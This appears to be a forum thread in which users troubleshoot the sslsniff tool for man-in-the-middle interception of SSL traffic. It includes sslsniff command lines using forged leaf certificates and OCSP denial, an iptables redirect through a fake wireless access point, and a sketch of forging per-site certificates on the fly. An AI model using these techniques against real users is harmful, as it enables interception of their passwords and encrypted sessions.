sslsniff 0.6

[Jimmy Kane]

ok awaiting .... does this work only on ie 6?

[Nick_the_Greek]

Quote:

Originally Posted by Jimmy Kane

OK awaiting .... does this work only on IE 6?

Unfortunately yes and only some times. Some times I got the known to us "assio read error 2" or "got SSL exception". I tried out with *\x00 certs with Firefox browser 3.0.11 with no luck. Don't know yet why this happend since FF was fixed after 3.0.13.

Security Advisories for Firefox 3.0:
Security Advisories for Firefox 3.0

and Security Advisory 2009-42
MFSA 2009-42: Compromise of SSL-protected communication

Also tried the leaf cert with IE 7, but my wife's habit is to install any security patches for everything. I will setup a VM with XP and IE 7 unpatched to test with.

If you want, PM me to send you instructions how to install it, since you are possessed with it. For now I don't want to post any wrong instructions and put people in trouble. I do prefer to test first.

Nick.

[Jimmy Kane]

I am ok with the install .... But when i have sslsniff running in targeted mode with the wildcard cert.
Most of the time it wont sniff but when it sniffs i get the known cert warning then i press accept (testing) and the connection want continiue.
in the sslsniff log i see a error with ssl .... i dont know why.... even Moxie Marlynspike doensn't .... Lol
Anyways if you want the targeted mode then you must have one ca cert ex. paypal. I have tried that....
No certificate warning but no pass/key sniffing and the connection goes on with sll.....

I dont know what to do....

Ps if you want anything to ask Moxie i could mail him ( he should respond)....

[Nick_the_Greek]

Hi Jimmy
I believe we starting to find a solution here. I said we starting because after all we talking about SSL. And SLL is a tough subject. I am not expecting to compile sslsniff, find one or certificates and...voila. It requires allot of reading, experimentation and time.

Anyway, I have never had succeed with targeted mode. I got the same results with you. Certificate warning from client's browser - accept from client - SSL exception from sslsniff's log.

BTW what browser your clients are using and what version?
I am asking that because AFAIK wildcard certs are not accepted from IE.

https://www.noisebridge.net/pipermai...er/008400.html

Quote:

It won't work for exploiting the bug for software written with the WIN32 api, they don't accept (for good reason) *

Did you try to deny OCSP requests from clients ? (-d option)
The following is how I get to sniff SSL sessions from clients (IE6 only):

Code:

sslsniff -a -d -s 10000 -c /sslsniff-0.6/leafcert.pem -w /sslsniff.log

and a screen shot:
http://uploadingit.com/file/kqjkpo7p...ng_expired.JPG

as you can see I get only a warning that the cert has expired. The date was not changed.

Quote:

No certificate warning but no pass/key sniffing and the connection goes on with sll.....

What do you mean by that? Your sslsniff session is bypassed and you got from your clients "real" SSL connection? (It happened many times to me)

Also when I tried to do client fingerprint (using airbase for fake wlan and sslsniff is running on 192.168.2.129:10000)

Code:

iptables -t nat -A PREROUTING -i at0 -p tcp -m tcp --dport 80 -j DNAT --to-destination 192.168.2.129:10000

I got connection time out. The same result as the above came up when I do browser specific attack.

Code:

sslsniff -a -d -s 10000 -f ie -h 80 -c /sslsniff-0.6/leafcert.pem -w /sslsniff.log

Quote:

Ps if you want anything to ask Moxie i could mail him ( he should respond)....

Maybe I will. Thank you for offering.At least he understand what am I asking for. I will do some testing no soon than this weekend. It's a busy week for me.

Keep in touch Jimmy.

Nick.

PS Try to do authority mode attack in IE6 with the expired leafcert.pem. At least you should see this God damn thing to work.

[finux]

Hi Guys,

Just wondering how you are getting on with SSLSniff, i played around with it yesterday on 8.10 and i had a little success however i'm at a loss with the whole wildcard cert, both the one that comes with SSLSniff and the one posted over at Noisebridge too.

If i can help in anyway let me know

Finux

Just to let you guys know i tested Firefox version 3.0 and it picked up the cert straight away saying it was revoked, i was running the minus -d option and downloaded firefox from oldapps.com/firefox.php?

However 2.0.0.20 was no problems

I used the pretty much standard stuff i found in the SSLSniff package, and i think the paypal cert i pulled of here

[Jimmy Kane]

Any progress made Nick?
For me none. I had no luck at all and from now on it is a waste of time....
I prefer ettercap filters.... ;-)

[Nick_the_Greek]

Quote:

Originally Posted by Jimmy Kane

Any progress made Nick?
For me none. I had no luck at all and from now on it is a waste of time....
I prefer ettercap filters.... ;-)

From time to time I am reading about certificates, what is SSL etc. I am not kind of person who gives up so easily. I am trying different things but in the end I got no significant progress. If I got some I will let you know.

Nick.

Quote:

Originally Posted by finux

....i played around with it yesterday on 8.10....

It will be nicer if you were running BT.

[Jimmy Kane]

I am also palying a long time now with tls connections. One of my favourites is sslstrip. But it is only fot http protocols.... This is it's weak point....
Anyway I am studying now more about TLS and SSL and maybe it will help...
Recently i read an exploit in packet-storm about renegotiating TLS it was a pretty good one.... Recommend it for many people (who do a little reading before practising attack's).
I will keep you informed with any progress i make .... And Nick please keep us informed too......
In most of the forums i read there are few people that like to "temper" with SSL ...

Be good dudes

[Nick_the_Greek]

Quote:

Originally Posted by Jimmy Kane

.... And Nick please keep us informed too......

Don't worry Jimmy.

When you get (if not) your own kids, the word "own" will disappear at the moment. The "own" will be replaced with "take" and "share".

What I am trying to say (maybe unsuccessfully) is, that I am a sharing guy.

If I got something important or new I will let you know.

Nick

[Gitsnik]

Quote:

Originally Posted by Nick_the_Greek

When you get (if not) your own kids, the word "own" will disappear at the moment. The "own" will be replaced with "take" and "share".

Kids? What about "wife"?!

I swear I've written something similar to this before somewhere but I can't find it. Anyway, an idea to prod some people along with - when you use iptables to redirect to a socket, that socket (that program) can do a lookup and request where you are going. So if I redirect to 192.168.1.3:8888 and have my program do a lookup, it can see that the connection was actually going to 92.23.220.121*. If that connection is found to have an SSL certificate on it, there is no reason one couldn't write a quick bit of code to generate a fresh certificate, sign it with a valid domain root cert, and pass it along.

Getting the valid domain root cert is difficult, as is making all this happen fast enough for the user, but there it is - ssl sniffing by breaking the single chain into two - the same way sslsniff does it I imagine, but working on anything you care to build it for.

There are limitations, I leave them up to the reader to discover and discuss.